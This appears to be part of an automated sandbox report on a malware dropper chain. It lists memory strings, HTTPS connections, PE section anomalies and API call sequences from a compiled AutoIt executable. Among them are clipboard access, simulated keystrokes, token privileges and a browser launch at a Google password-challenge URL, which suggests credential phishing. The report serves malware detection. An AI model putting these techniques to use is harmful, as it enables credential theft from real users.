                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/ios/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_campa
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#crash-reporter
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/legal/privacy/firefox.html#health-report
                          Source: firefox.exe, 00000018.00000002.2794739483.000002BA5544E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
                          Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_c
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/V
                          Source: ae5cfd188c.exe, 00000007.00000003.2546663307.0000000005715000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2689925143.0000000005531000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                          Source: firefox.exe, 00000018.00000002.2794739483.000002BA5544E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/s
                          Source: firefox.exe, 00000018.00000003.2737226174.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2885242531.000010DF2E030000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2854854049.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2728347300.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com
                          Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.olx.pl/
                          Source: firefox.exe, 00000018.00000002.2795803239.000002BA555DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.openh264.org/
                          Source: firefox.exe, 00000018.00000002.2825287749.000002BA5A25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A20A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A4DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.reddit.com/
                          Source: firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/
                          Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.wykop.pl/4
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2821559085.000002BA59FAC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2825287749.000002BA5A20A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A70A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                          Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.zhihu.com/
                          Source: firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpString found in binary or memory: https://xhr.spec.whatwg.org/#sync-warningThe
                          Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://yandex.com
                          Source: firefox.exe, 00000018.00000002.2857928108.000002BA5D0D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2870614524.000002BA61988000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com
                          Source: firefox.exe, 00000018.00000002.2864606177.000002BA5D4EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BECB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/
                          Source: firefox.exe, 00000018.00000002.2857928108.000002BA5D0D2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C6B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791688549.000002BA49A00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C39000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2870614524.000002BA61990000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C0F3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791760719.000002BA49A19000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA55443000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C0A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554DA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2860458807.000002BA5D10B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878984131.000002BA61F57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2847205509.000002BA5BE7A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2731037127.000002BA5C0A2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C5E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2782423918.000001B8C4F1A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784518284.000001B8C5114000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2782423918.000001B8C4F10000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2781901454.000001AF5A3B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
                          Source: firefox.exe, 00000016.00000002.2642169411.000001D3456C7000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2652441512.000001BD98D80000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2791760719.000002BA49A19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
                          Source: firefox.exe, 00000018.00000002.2793027167.000002BA4B4E2000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2793027167.000002BA4B4BA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784518284.000001B8C5114000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2782423918.000001B8C4F10000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2781901454.000001AF5A3B0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2782554796.000001AF5A544000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
                          Source: 2ada66c192.exe, 0000000B.00000003.2692799251.0000000001092000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2690178414.000000000108D000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000002.2697938782.0000000001096000.00000004.00000020.00020000.00000000.sdmp, 2ada66c192.exe, 0000000B.00000003.2694374109.0000000001092000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwde
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49781 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49790 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49800 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49806 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49814 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49821 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49827 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49833 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49834 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49842 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49852 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49861 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49864 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49880 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49885 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49889 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49897 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49898 version: TLS 1.2
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006EEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_006EEAFF
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006EED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,11_2_006EED6A
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006EEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,11_2_006EEAFF
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006DAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,11_2_006DAA57
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_00709576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,11_2_00709576

                          System Summary

                          barindex
                          Source: 2ada66c192.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                          Source: 2ada66c192.exe, 0000000B.00000000.2593438166.0000000000732000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_47284277-4
                          Source: 2ada66c192.exe, 0000000B.00000000.2593438166.0000000000732000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_0c647206-b
                          Source: 2ada66c192.exe, 0000001E.00000002.2915748492.0000000000732000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_1303e518-c
                          Source: 2ada66c192.exe, 0000001E.00000002.2915748492.0000000000732000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_418b65b3-6
                          Source: 2ada66c192.exe, 0000002C.00000000.2906143455.0000000000732000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_7f544493-d
                          Source: 2ada66c192.exe, 0000002C.00000000.2906143455.0000000000732000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_7fab1405-2
                          Source: file.exeStatic PE information: section name:
                          Source: file.exeStatic PE information: section name: .idata
                          Source: skotes.exe.0.drStatic PE information: section name:
                          Source: skotes.exe.0.drStatic PE information: section name: .idata
                          Source: random[1].exe.6.drStatic PE information: section name:
                          Source: random[1].exe.6.drStatic PE information: section name: .idata
                          Source: random[1].exe.6.drStatic PE information: section name:
                          Source: ae5cfd188c.exe.6.drStatic PE information: section name:
                          Source: ae5cfd188c.exe.6.drStatic PE information: section name: .idata
                          Source: ae5cfd188c.exe.6.drStatic PE information: section name:
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: random[1].exe0.6.drStatic PE information: section name: .idata
                          Source: random[1].exe0.6.drStatic PE information: section name:
                          Source: 37df924488.exe.6.drStatic PE information: section name:
                          Source: 37df924488.exe.6.drStatic PE information: section name: .idata
                          Source: 37df924488.exe.6.drStatic PE information: section name:
                          Source: random[1].exe2.6.drStatic PE information: section name:
                          Source: random[1].exe2.6.drStatic PE information: section name: .idata
                          Source: 9c2827fca4.exe.6.drStatic PE information: section name:
                          Source: 9c2827fca4.exe.6.drStatic PE information: section name: .idata
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00ABCB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,6_2_00ABCB97
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006DD5EB: CreateFileW,DeviceIoControl,CloseHandle,11_2_006DD5EB
                          Source: C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exeCode function: 11_2_006D1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,11_2_006D1201
